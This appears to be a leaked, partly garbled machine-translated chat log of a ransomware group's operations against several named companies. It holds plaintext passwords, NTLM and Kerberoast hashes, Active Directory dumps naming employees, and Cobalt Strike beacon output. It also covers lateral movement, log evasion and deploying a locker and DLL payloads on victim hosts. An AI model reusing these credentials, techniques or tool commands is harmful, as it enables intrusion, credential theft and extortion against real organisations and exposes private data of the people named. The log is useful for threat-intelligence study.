WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 Administrator
```
and on this all-logins and passwords
give separate information about the admins' cars
okay, so my version
yes, i think the new version of ff changed the algorithm
as i remember he did not give anything other than mozilla
sharpweb seems not to work
yes sharpweb also pushed mozilla
they have no ff
separately goes edge new and chrome
on itself checks only browsers on the chrome engine
sharpchromium all browsers
you looked only chrome?
but after the signal head-on that we're back more likely soon to redo everything
they probably rolled back and scored their passwords
2-3 duplicates per YES)
and as for passwords I would check their mail for starters as a variant
yes
or bring them keyloggers, or what...
paper to steal
they go there through the network anyway
why?
well, we'll have to go to them then, hulino traces in any case is there
avlya not on the network accesses may be on the paper also if you think so
http://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_GUI_Administration_Guide_NOS_50x.whz/unm1501525250368.html
By the way, they had folders restore - like from programs to restore deleted files.
it's just a word that the accesses to the crash site will be fresh
and they rolled back quickly after the first one and the grid goes on the second circle
just to think about it after such a clear sign that the fight is not over
they probably understand if the grid goes on the second circle
Hueeeeeeeew))) he probably decided to work from home, bastard)
and like now burned him
Sharpchromium removed passwords, removed logopassword, in chrome handheld browsed the history.
did you look for traces of nimble? did you read his mail?)
the answer was no.
did you check if he was using nimble browser or if he had a ms outlook client?
I turned on the rdp on it, is there a car?
did not find access to the mail
have not looked?
there is another option, on the synology put passwords blauer, perhaps on the nimbles, too, he too.
and the logs that is backed up there, how many admins from nimble group have you been?
there only correspondence with the seller and the correspondence on the setting (dock, I've already thrown)
there's also a maximum I followed @user7 found information from the pdf
checked for these tags and nimble looked for and saw the hostname
nimble)
I was at the post of a few dudes, there on the subject veeam, backup, pass, sphere, center nothing
I searched the mail with a few dudes about veeam, backup, pass, sphere, center blank. at most on the backup came out that i screenshot, about data stolen network hacked, and all
They probably all it department domain admins - not to get up twice))
and maybe in correspondence lit up something interesting
he gets here
```
>displayName: Greg Keller
>uSNCreated: 17303
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
```
but since he's a developer they have an internal portal, maybe you should still look there
no keller is a developer. they have blauer
not removed his access from the outlook?
gkeller
is 60% sure that this guy has access to the mail there
so what's wrong with us
with us
where did you get this?
as well as the root
lintam still has an alert for temperature
```
Message: Temperature sensor bp-temp1 on shelf AF-180176 at left-side backplane is 33 Celsius. Check air temperature and air flow around the array.
```
`https://wwhq62nas.us2.quickconnect.to/`
the rdp port is open the rest is not
tpio writes login was from this ip
ai ask what the rdp know)
`ww-nimble-01` is the nimble which is 192.168.0.75
what do we have here? 127.0.1.2:3389
```
Time: Wed Oct 7 10:58:43 2020
Type: 14806
ID: 13472
Message: Root login to controller A from 127.0.1.2 succeeded.
Group Name: Group1
Array name: ww-nimble-01
Serial: AF-180176
Version: 4.5.2.0-553085-opt

Arrays in the group:
---------------------+-----------------+-----------+----------------
Name                  Serial            Model       Version
---------------------+-----------------+-----------+----------------
ww-nimble-01          AF-180176         CS1000      4.5.2.0-553085-opt
```
cloudy?
`https://192.168.63.30:5001/` - same us
`https://waterway63.us2.quickconnect.to/` - 1 more us
give password
No luck?
and mail the hostname `ww-nimble-01`
but there is a client installed
check the installed software else
192.168.0.162:3389
if the service is off do you turn it on? if the service is on do you turn it off
do you turn it on
why do you say the rdp does not let techies in?
```
21          ftp
22,23       ssh, telnet
80,443      http, https
5900        VNC
3389        Microsoft Terminal Server (rdp)
5631,5632   pcAnywhere
445,1433    MS-SQL Server
3306        MySQL
1521,2483   Oracle
5432        PostgreSQL
5938        nbvdm.th
7199        JMX monitoring port
7000        inter-node cluster
7001        SSL inter-node cluster
9042        CQL Native Transport Port
9160        Thrift
DataStax OpsCenter
61620       opscenterd daemon
61621       Agent
8888        Website

1-30,80,443,5900,3389,5631,5632,445,1433,3306,1521,2483,5432,5938,7199,7000,7001,9042,9160,61620,8888,61621
```
By the way, here's an addition to the port
0.1:5432") shows that PostgreSQL is listening only for connections originating from the local computer, so we will have to edit the
My mistake.
pcAnywhere was a suite of computer programs by Symantec which allows a user of the pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are connected to interconnected networks and the password is known `````` PCAnywhere uses ports 5631 (Data port or Transmission Control Protocol [TCP]) and 5632 (Status port or User Datagram Protocol [UDP]) to communicate ``you know what this is?)``192.168.0.75:5432```` 192.168.0.75:5432 192.168.0.75:443 192.168.0.75:80 [+] received output: 192.168.0.75:22 (SSH-2.0-OpenSSH_7.4) Scanner module is complete ``Please pay attention to 2http/chttp what scheme are you connecting to? https://192.168.0.42 https://192.168.0.43 https://192.168.0.75 https://192.168.0.77 ``what ip?'' No rdp on nimblenet too User: gkeller - IP Address: 192.168.0.162 ``No rdp here, what's the IP? WATERWAY\mapusatera Gators1853 `````` CurrentUser : WATERWAY\mapusatera Idletime : 01h:54m:23s:531ms (352463531 milliseconds) ``172.17.112.1 as I understand the pdf says that they are from the AD check only idletimevariant good and from there to chekatmb to them on RDP go to the thing about the Guy nimbala I have on all tacts several IP inputs as I understand + you on the same ip go? I have a few different ways to get to him, but I don't know how to get to him. gkeller 134cee9671bb94bffdaefb6f84f5989d Now that's interesting. 
dn:CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >objectClass: top >objectClass: group >cn: Nimble Admins >member: CN=Brandon Lauer,CN=Users,DC=waterway,DC=com >member: CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=appliedgroup,OU=Special Users,OU=Corporate,DC=waterway,DC=com >member: CN=Greg Keller,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=Mark Harper,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=Mike Pusatera,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=Administrator,OU=Special Users,OU=Corporate,DC=waterway,DC=com ``` ``` blauer djarden gkeller waterway76 mharper mapusatera Gators1853 Administrator 1853Gators the same with ssx similarly doyten you do not go through rdp via proxy any manipulations with the network are done through a dedik as rdp ssx skl web and so on you still dedik for that, do you connect to the network through ssx proxy?) to sum it up: use vince for testing ssx accesses with vince also happens, but rarely. in more serious systems on the same level as the current date of connection will hang an error that there was a failed attempt to enter on such and such a day from such and such a path during authorization successful afterwards just if through ssh directly fixed message in the log getsthere is already experience)do not knowhough here, about whether a failed password gets into the log during copying via sabinet - here I will not argue))) I know, constantly use. Not winSCP though, but the usual linux one. but underneath both Ibsch is not pure ssh WinSCP supports five transfer protocols: SFTP (SSH File Transfer Protocol); FTP (File Transfer Protocol); SCP (Secure Copy Protocol); Can sshp help? It's the same ssh under the hood, but proxies don't help. a) you can fuck up your password at least, and this message about failed logon the next time you log on to SCP b) the alerts to your email c) Login by proxy proxy proxy so we are through proxy. 
and I have not heard about vincezp...for the simple reason that if you catch a wrong password you will not leave a passchalk in the form of logs at the login accesses are tested ONLY WITHIN vincezp do not forget``` WATERWAY\Applied Waterway99 `````` local-user admin class manage password hash $h$6$yUYGy+aaZlXJHmJn$E6qtQR7QVSx4y2M5eR2N3o6luDGdCZ5iXdLn1a5qGEO/pXQo7Qo2tynxcjVzbNiH2IsvDgEKeye H2W6DyHkJDA== service-type telnet http https terminal authorization-attribute user-role network-admin authorization-attribute user-role network-operator # local-user applied class manage password hash $h$6$hKewp2sE1Ks4S7TF$/ymqDpm46U4XCP9njU4FMbDOxm9Gwnk0oC7ScVyhFSwKIn7M42+gfjHGOBIVAtfM1J5tvL3U xKW4isDfXhCjpw== ``What do you know now about the usefulness of the mail) at the post office admins - where? there is a doc with the settings on the mail screenshot? 22roottakoy and only such and only such ashhostnamevbibee ip on the request backup issued takoene then read))) and procheck passwords through mail can transfer keys if we nimbly get in, what's the point of mail?why should mail have priority or look for a separate tool on git why should mail have priority? URL : https://mail.datotel.com/ Username : jboden@waterway.com Password : Moose1234! ``nimbles has ssh, but it's keyed. what can i do to get the creds off putty? user9https://www.stellarinfo.com/article/export-exchange-2010-mailbox-to-pst.php`` Username : Administrator Domain : ALLOY Password : j@mez9olk ``Trying to log in to the ehas under dudes that have ``ou=Exchange Administrative Group`` with mailsniper, rumor has it that it doesn`t work went to the exh server, opened the exh shell, it fell out with this oneilsniper? WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in another Active Directory site. 
WARNING: No Exchange servers are available in the Active Directory site France. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Indy. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Orange. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site VA. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Singapore. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Crocket. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Mexico. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Germany. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Ohio. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site WI. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Henderson. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Nevada. Connecting to an Exchange server in another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Poland. Connecting to an Exchange server in Another Active Directory site. WARNING: No Exchange servers are available in the Active Directory site Suzhou. 
Connecting to an Exchange server in WARNING: Connecting to an Exchange server in another Active Directory site. VERBOSE: Connecting to Exchange.rtpco.local. `````` Username : arobinsona Domain : RTPCO Password : Passw0rd! Username : O365Service Domain : RTPCO Password : Password1! ``If we've done what we can do, why wait for him to write ``. Trend breaks the locker, not the note, but now it also breaks the tht, that's why it doesn't leave a note it's better to wait for mana ``I'm not sure if it's all encrypted there, so unscramble it and fuck with their heads.) Or make a file with a different name and content slightly tampered with.What about the note if the locker worked ok? mostly kerbs no attention or 1-2 networks maxrode nigdea tell me where the NTDS dumped there `` bigassfans.com fishusa.com healthcare.com mgrmedu.com telecomlabsinc.com bnpmedia.com forestriverinc.com holzerford.com netease.com unf.edu cpcc.edu globaltranz.com humboldt.edu oasispetroleum.com vpinc.net desire2learn.com gpj.com mapciasp.com orenco.com zohocorp epcusa.com happay.in matchesfashion.com snpartners.com I can't find my build on my hardcodile triad just psh doesn't work) there's a guy who "rules" it out there and please give me a .net shairfinder will you take it? i'll brougt the vpnotscan sabiki find adr? ok i'll give all vpnos to work for it already there's one on backdoor triadmetals alloypolimers ballymoregroup how much? they said you have the grids? tomorrow's boot? yes please clean out the dead sessions there yes? no need, i already ordered it, i just want to test it today on some and this one will do fine1 i can give you a fresh one i ordered 3 for the boot i can give you the old one, it's the one wilson lochy you ordered a new one for you already the old one? cause the old one) i thought you flooded it aaa ok give it to @user4 i can work on it? you do not use this server? 
104.194.10.161ARCHIVE.loomisco.com yes, extended, please``` loomisco.com\EDIADMIN:APPSYS loomisco.comShutdown:p3bk@c1 loomisco.com/Omiller:Angela327! ``I'll write a full report with commands or only the steps? Immediately report as found@tl1 @tl2Keach such error reduces the number of remaining authorization attempts before the account is blocked. ERROR: Logon failure: unknown user name or bad password. `````` beacon> net share [*] Tasked beacon to run net share on localhost [+] host called home, sent: 104505 bytes [+] received output: Shares at \localhost: Share name Comment ---------- ------- ADMIN$ Remote Admin C$ Default share F$ Default share IPC$ Remote IPC Scan_Data `````` beacon> net logons [*] Tasked beacon to run net logons on localhost [+] host called home, sent: 104506 bytes [+] received output: Logged on users at \localhost: [+] received output: Loomisco\Backupuser SCANSTORAGE\Backupuser Loomisco\Backupuser LOOMIS\SCANSTORAGE$ ``loomisco.com beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: loomisco.com `````` Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::p3bk@c1 ````Loomisco\Backupuser ASdnmxcsdf@#d```` Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SophosSAUSCANSTORaaa:1005:aad3b435b51404eeaad3b435b51404ee:546026a5bc5721ea345185056d7e21c1::: `````` beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 104518 bytes [+] received output: Domain Controllers: Server Name IP Address ----------- ---------- TLCDC1 192.168.0.192 TLCDC2 192.168.0.222 ``user9files won't fly (sextg@tl1``) CORP\jvelazquezg 956e44f5069e8f0161ea7064840894ff CORP\Rflores 3e33c0155d517e77ad1a4040c9ed4e45 CORP\lvegar 06ca20732bea98870c93d29a2b31e783 FILIAL\Anavarretea 5cb20c880326791e424fc9f2554ae9b4 
CORP\evazquezpr 288c03a4543cf46d0a665df89f1b8a3d ``` I managed to get the hashes down. Teemo[SFE18491]Hgutierreze/792560|2021Jan28 20:51:16> shell tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx [*] tasked beacon to run: tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx [+] host called home, sent: 82 bytes Nombre de imagen PID Nombre de sesión Núm. de ses Uso de memor Nombre de usuario Tiempo de CP ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 4 KB NT AUTHORITY\SYSTEM 1600:47:50 System 4 Services 0 256 KB N/D 3:39:06 smss.exe 1340 Services 0 1,052 KB NT AUTHORITY\SYSTEM 0:00:01 csrss.exe 1452 Services 0 4,724 KB NT AUTHORITY\SYSTEM 0:00:42 wininit.exe 1524 Services 0 4,152 KB NT AUTHORITY\SYSTEM 0:00:00 services.exe 1616 Services 0 14,012 KB NT AUTHORITY\SYSTEM 0:02:46 lsass.exe 1660 Services 0 60,944 KB NT AUTHORITY\SYSTEM 0:27:11 svchost.exe 1752 Services 0 22,616 KB NT AUTHORITY\SYSTEM 0:06:03 svchost.exe 1784 Services 0 14,632 KB NT AUTHORITY\NETWORK SERVICE 0:03:50 svchost.exe 1900 Services 0 25,576 KB NT AUTHORITY\LOCAL SERVICE 3:10:52 svchost.exe 1916 Services 0 91,696 KB NT AUTHORITY\SYSTEM 2:50:25 svchost.exe 1940 Services 0 18,528 KB NT AUTHORITY\LOCAL SERVICE 0:01:21 Citrix.Wem.Agent.Service. 
1996 Services 0 135,548 KB NT AUTHORITY\SYSTEM 0:12:47 svchost.exe 1412 Services 0 73,540 KB NT AUTHORITY\SYSTEM 3:24:01 Citrix.Wem.Agent.LogonSer 1188 Services 0 26,320 KB NT AUTHORITY\SYSTEM 0:00:02 svchost.exe 1608 Services 0 23,080 KB NT AUTHORITY\NETWORK SERVICE 0:10:18 CtxPvDSvc.exe 1180 Services 0 7,976 KB NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 1404 Services 0 28,256 KB NT AUTHORITY\SYSTEM 0:00:34 UserProfileManager.exe 2068 Services 0 15,532 KB NT AUTHORITY\SYSTEM 0:05:52 svchost.exe 2184 Services 0 9,100 KB NT AUTHORITY\LOCAL SERVICE 0:00:05 svchost.exe 2236 Services 0 16,064 KB NT AUTHORITY\LOCAL SERVICE 0:00:21 PvsVmAgent.exe 2268 Services 0 6,068 KB NT AUTHORITY\SYSTEM 0:00:00 BNDevice.exe 2388 Services 0 11,816 KB NT AUTHORITY\SYSTEM 0:00:00 spoolsv.exe 2544 Services 0 77,740 KB NT AUTHORITY\SYSTEM 0:39:24 armsvc.exe 2584 Services 0 6,768 KB NT AUTHORITY\SYSTEM 0:00:00 BrokerAgent.exe 2712 Services 0 136,640 KB NT AUTHORITY\NETWORK SERVICE 0:15:24 CdfSvc.exe 2820 Services 0 7,636 KB NT AUTHORITY\NETWORK SERVICE 0:00:00 encsvc.exe 2860 Services 0 6,972 KB NT AUTHORITY\LOCAL SERVICE 0:39:29 CseEngine.exe 2948 Services 0 1,081,368 KB NT AUTHORITY\SYSTEM 4:51:34 ctxrdr.exe 3004 Services 0 7,360 KB NT AUTHORITY\LOCAL SERVICE 0:00:00 CtxCeipSvc.exe 2064 Services 0 8,804 KB NT AUTHORITY\LOCAL SERVICE 0:00:00 CpSvc.exe 2156 Services 0 35,064 KB NT AUTHORITY\LOCAL SERVICE 0:17:06 CtxAppVService.exe 2464 Services 0 45,288 KB NT AUTHORITY\SYSTEM 0:00:00 CtxSvcHost.exe 2428 Services 0 9,856 KB NT AUTHORITY\LOCAL SERVICE 0:00:04 CtxSvcHost.exe 2684 Services 0 8,204 KB NT AUTHORITY\LOCAL SERVICE 0:00:00 WebSocketService.exe 532 Services 0 9,924 KB NT AUTHORITY\SYSTEM 0:00:01 CtxSvcHost.exe 1016 Services 0 8,096 KB NT AUTHORITY\LOCAL SERVICE 0:00:01 CtxSvcHost.exe 912 Services 0 7,536 KB NT AUTHORITY\LOCAL SERVICE 0:00:00 CtxSvcHost.exe 392 Services 0 12,740 KB NT AUTHORITY\LOCAL SERVICE 0:00:42 macmnsvc.exe 988 Services 0 12,816 KB NT AUTHORITY\LOCAL SERVICE 
0:00:13 masvc.exe 1128 Services 0 28,904 KB NT AUTHORITY\LOCAL SERVICE 0:03:42 CtxSvcHost.exe 2764 Services 0 7,372 KB NT AUTHORITY\LOCAL SERVICE 0:00:00 SCService64.exe 2656 Services 0 23,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:17 svchost.exe 2516 Services 0 40,968 KB NT AUTHORITY\NETWORK SERVICE 0:48:48 SemsService.exe 2872 Services 0 39,660 KB NT AUTHORITY\LOCAL SERVICE 0:02:54 ImaAdvanceSrv64.exe 3192 Services 0 8,708 KB NT AUTHORITY\SYSTEM 0:00:18 macompatsvc.exe 3968 Services 0 15,224 KB NT AUTHORITY\SYSTEM 0:00:12 mfemactl.exe 3164 Services 0 8,196 KB NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2844 Services 0 11,260 KB NT AUTHORITY\SYSTEM 0:01:11 svchost.exe 4108 Services 0 7,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:02 TelemetryService.exe 3092 Services 0 69,936 KB NT SERVICE\CitrixTelemetryService 0:00:08 AotListener.exe 2040 Services 0 25,312 KB NT SERVICE\CitrixTelemetryService 0:00:00 conhost.exe 4584 Services 0 6,008 KB NT SERVICE\CitrixTelemetryService 0:00:00 VSSVC.exe 3892 Services 0 9,224 KB NT AUTHORITY\SYSTEM 0:00:00 msdtc.exe 3720 Services 0 9,652 KB NT AUTHORITY\NETWORK SERVICE 0:00:00 svchost.exe 2932 Services 0 6,780 KB NT AUTHORITY\LOCAL SERVICE 0:00:00 mctelsvc.exe 428 Services 0 15,404 KB NT AUTHORITY\SYSTEM 0:00:03 CloudamizeWatchdog.exe 4036 Services 0 44,692 KB NT AUTHORITY\SYSTEM 0:01:43 csrss.exe 4132 Console 2 3,928 KB NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 2172 Console 2 10,192 KB NT AUTHORITY\SYSTEM 0:00:00 logonUI.exe 2452 Console 2 28,604 KB NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 3076 Console 2 27,300 KB Window Manager\DWM-2 0:00:00 WmiPrvSE.exe 13236 Services 0 36,596 KB NT AUTHORITY\SYSTEM 0:58:13 WmiPrvSE.exe 1288 Services 0 24,688 KB NT AUTHORITY\LOCAL SERVICE 0:01:42 WmiPrvSE.exe 11844 Services 0 12,904 KB NT AUTHORITY\NETWORK SERVICE 0:02:52 csrss.exe 10104 ICA-CGP#13 108 12,360 KB NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 12108 ICA-CGP#13 108 13,176 KB NT AUTHORITY\SYSTEM 0:00:06 dwm.exe 11816 ICA-CGP#13 108 38,720 KB Window 
Manager\DWM-108 0:00:01 ctxgfx.exe 8400 ICA-CGP#13 108 26,860 KB NT AUTHORITY\SYSTEM 0:00:01 taskhostex.exe 10436 ICA-CGP#13 108 9,088 KB CORP\jvelazquezg 0:00:00 icak2meng.exe 12952 ICA-CGP#13 108 7,344 KB NT AUTHORITY\SYSTEM 0:00:00 wfshell.exe 9128 ICA-CGP#13 108 21,312 KB CORP\jvelazquezg 0:00:00 CtxMtHost.exe 8132 ICA-CGP#13 108 8,584 KB CORP\jvelazquezg 0:00:00 SptEddss.exe 4080 ICA-CGP#13 108 38,776 KB CORP\jvelazquezg 0:00:14 DirectorComServer.exe 12256 ICA-CGP#13 108 21,836 KB CORP\jvelazquezg 0:00:00 csrss.exe 10924 ICA-CGP#14 120 8,728 KB NT AUTHORITY\SYSTEM 0:00:03 winlogon.exe 12836 ICA-CGP#14 120 13,232 KB NT AUTHORITY\SYSTEM 0:00:01 dwm.exe 1860 ICA-CGP#14 120 37,976 KB Window Manager\DWM-120 0:00:02 ctxgfx.exe 9544 ICA-CGP#14 120 46,704 KB NT AUTHORITY\SYSTEM 0:00:06 icak2meng.exe 8960 ICA-CGP#14 120 7,344 KB NT AUTHORITY\SYSTEM 0:00:00 taskhostex.exe 2036 ICA-CGP#14 120 9,016 KB CORP\lvegar 0:00:00 wfshell.exe 13040 ICA-CGP#14 120 20,920 KB CORP\lvegar 0:00:00 DirectorComServer.exe 13264 ICA-CGP#14 120 21,900 KB CORP\lvegar 0:00:00 CtxMtHost.exe 9096 ICA-CGP#14 120 8,576 KB CORP\lvegar 0:00:00 PgmCtl32.exe 1720 ICA-CGP#14 120 71,376 KB CORP\lvegar 0:01:56 TitleMan.exe 12948 ICA-CGP#14 120 33,388 KB CORP\lvegar 0:00:01 WmiPrvSE.exe 11700 Services 0 13,344 KB NT AUTHORITY\NETWORK SERVICE 0:00:05 csrss.exe 580 ICA-CGP#113 77 8,312 KB NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 4428 ICA-CGP#113 77 13,208 KB NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 3736 ICA-CGP#113 77 29,288 KB Window Manager\DWM-77 0:00:00 ctxgfx.exe 9272 ICA-CGP#113 77 26,384 KB NT AUTHORITY\SYSTEM 0:00:00 icak2meng.exe 12472 ICA-CGP#113 77 7,300 KB NT AUTHORITY\SYSTEM 0:00:00 wfshell.exe 12764 ICA-CGP#113 77 21,344 KB FILIAL\Anavarretea 0:00:00 CtxMtHost.exe 600 ICA-CGP#113 77 8,580 KB FILIAL\Anavarretea 0:00:00 Accounts.exe 3824 ICA-CGP#113 77 32,612 KB FILIAL\Anavarretea 0:00:13 taskhostex.exe 12336 ICA-CGP#113 77 8,968 KB FILIAL\Anavarretea 0:00:00 DirectorComServer.exe 6428 ICA-CGP#113 
77 21,860 KB FILIAL\Anavarretea 0:00:00 csrss.exe 9464 ICA-CGP#115 38 8,640 KB NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 5088 ICA-CGP#115 38 13,196 KB NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 9640 ICA-CGP#115 38 29,636 KB Window Manager\DWM-38 0:00:00 ctxgfx.exe 456 ICA-CGP#115 38 35,472 KB NT AUTHORITY\SYSTEM 0:00:00 icak2meng.exe 10760 ICA-CGP#115 38 7,332 KB NT AUTHORITY\SYSTEM 0:00:00 taskhostex.exe 9872 ICA-CGP#115 38 8,988 KB CORP\pbsilvalo 0:00:00 wfshell.exe 6504 ICA-CGP#115 38 20,820 KB CORP\pbsilvalo 0:00:00 CtxMtHost.exe 8168 ICA-CGP#115 38 8,588 KB CORP\pbsilvalo 0:00:00 PgmCtl32.exe 8600 ICA-CGP#115 38 66,664 KB CORP\pbsilvalo 0:00:10 DirectorComServer.exe 4588 ICA-CGP#115 38 21,900 KB CORP\pbsilvalo 0:00:00 TitleMan.exe 11740 ICA-CGP#115 38 33,332 KB CORP\pbsilvalo 0:00:01 SptEddss.exe 9260 ICA-CGP#13 108 35,328 KB CORP\jvelazquezg 0:00:05 rundll32.exe 7884 Services 0 11,312 KB NT AUTHORITY\SYSTEM 0:00:00 rundll32.exe 5968 Services 0 11,336 KB NT AUTHORITY\SYSTEM 0:00:00 powershell.exe 10816 Services 0 91,076 KB NT AUTHORITY\SYSTEM 0:00:01 conhost.exe 12992 Services 0 6,172 KB NT AUTHORITY\SYSTEM 0:00:00 powershell.exe 10928 Services 0 52,624 KB NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 4548 Services 0 5,940 KB NT AUTHORITY\SYSTEM 0:00:00 ``` something does not draw the car@user7 then work here `` User : NT AUTHORITY\SYSTEM Window : Conexión - Internet Explorer Time : 2021-01-28 09:36:38 a. m. LogFile : WireTap.log ---------------------------------------------- hgutie [+] received output: 73HILArioge= Just like a peep in the eye. TrGUI ======= R8WTksIOle1rP8)P 253758 ``` vpn``. 
202B fil 09/23/2020 16:25:07 pas.txt 903.2KB fil 09/21/2020 14:59:51 seatinfo.txt ``` and files left)I won't repeat any more where the hashtag format ``` [*] Tasked beacon to psinject: invoke-kerberoast | fl into 508 (x64) [+] host called home, sent: 133723 bytes [+] received output: TicketByteHexStream : Hash : $krb5tgs$host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amAccountName : Pwwadfssvc DistinguishedName : CN=PwwAdfs Svc,OU=Users,OU=AuthManagement,DC=gpj,DC=loc ServicePrincipalName : host/STS.GPJ.COM `````` [RESULT] Username: Administrator (built-in) [RESULT] Changed: 2015-06-29 09:18:32 [RESULT] Password: DdhGmek/pc [RESULT] Username: install [RESULT] Changed: 2015-06-29 09:46:46 [RESULT] Password: rt/98740/pc [RESULT] Username: Lack [RESULT] Changed: 2014-10-06 09:45:54 [RESULT] Password: RT+farbe if there is time to work with the nessession arrived)ah, then delete all but one dead ones with a ping in a few hoursdid you have dead ones if there are? with you what happens to mine?ok, go back to the other 14 tasks closed without a note? great) in the root of the rdmi appeared) ok if there will be rdmi then ok try to run dlla 17 will not work? ok take a secondary server with a session to 15 makstam so much? if more than 10 is ok? all mapping or whatever? no i just picked up disks ts. I'll check if the balls are done? + in short, I'll work in a shared coba, maybe delete 50? it looks like I have a problem with the coba. run a dll from a user7 to him the session flew. he tried to throw it to me - no luck. then he threw it in the coba, where we get sessions today. I tried to dump it on myself - again no luck. I restarted cobalt at 7 o'clock. I'll try the others. 
I went in order and stopped at the first one and masked the rest.no use, llvm and both checkboxes checked - no session anyway, i made a dll in bilder, it copied, i ran it, it disappeared, but no session...i'll give you access to bilderado dll maybe better, mine will not raise sessionokeid.bild left? ok, let's do maybe it is. stalin says "hz" `` Volume in drive \10.0.61.17\c$ has no label. Volume Serial Number is F476-EA6A Directory of \10.0.61.17\c$ 08/22/2013 08:52 AM PerfLogs 12/08/2020 05:22 PM 204,192 pl64.dll 03/29/2019 01:30 PM Program Files 12/09/2020 07:42 AM Program Files (x86) 12/09/2020 08:06 AM 42,606,592 redcloak.msi 03/06/2015 10:26 AM sysprep 06/13/2019 02:08 PM Users 07/25/2020 07:12 PM Windows 10/26/2018 12:36 PM Zabbix_Agent ``but I don't see a note in these, ok, the dll could have stayed since the sessions were from a process and the dll can't be killed``` Volume in drive \10.0.61.87\c$ has no label. 
Volume Serial Number is 6847-A1AE Directory of \10.0.61.87\c$ 09/14/2012 12:22 PM 5,210,976 445622_intl_x64_zip.exe 03/23/2016 01:35 PM 1,435,680 adksetup(1).exe 06/03/2011 12:54 PM 119 FIREWALL 12/10/2020 07:07 AM 0 KBSERVICE.SHUTDOWN 06/03/2011 01:10 PM 924,544 keyManagementServiceHost.exe 11/19/2014 04:57 PM 434,152 office2013volumelicensepack_x86_en-us.exe 07/13/2009 07:34 PM PerfLogs 12/08/2020 05:37 PM 0 pl64.dll 03/29/2019 01:30 PM Program Files 01/16/2018 04:10 PM Program Files (x86) 05/21/2020 09:53 AM Users 01/14/2019 11:33 AM Win7AndW2K8R2-KB3191566-x64 12/08/2020 06:34 PM Windows 07/02/2012 02:32 AM 5,084,750 Windows6.1-KB2691586-v9-x64.msu 10/21/2013 12:45 PM 7,769,979 Windows6.1-KB2885698-x64.msu 10/29/2018 02:49 PM Zabbix_Agent `````` Directory of \10.0.50.71\c$ 08/03/2017 01:19 PM B5465 P639 Firmware 08/03/2017 01:18 PM 223,498,304 B5465 P639 Firmware.zip 11/03/2017 09:55 AM batch 08/17/2017 01:43 PM Canon_backups 09/12/2016 04:34 AM logs 02/24/2018 06:04 AM PerfLogs 12/08/2020 05:19 PM 204,192 pl64.dll 11/03/2017 09:58 AM Printer_Exports 03/29/2019 01:29 PM Program Files 12/09/2020 02:51 PM Program Files (x86) 10/24/2016 07:12 AM sysprep 10/05/2020 02:13 PM Users 11/21/2020 08:29 PM Windows 10/26/2018 08:11 AM Zabbix_Agent 07/16/2018 01:39 AM 2,423 __PatchLink0026.cab `````` Volume in drive\10.0.61.117\c$ has no label. Volume Serial Number is D242-6D7F Directory of \10.0.61.117$ 11/01/2016 10:32 AM 7,789,336 ControlNowAgentSetup.exe 09/12/2016 04:34 AM Logs 05/28/2018 02:16 AM PerfLogs 12/08/2020 05:18 PM 204,192 pl64.dll 03/29/2019 05:54 PM Program Files 12/09/2020 10:18 AM Program Files (x86) 12/09/2020 08:06 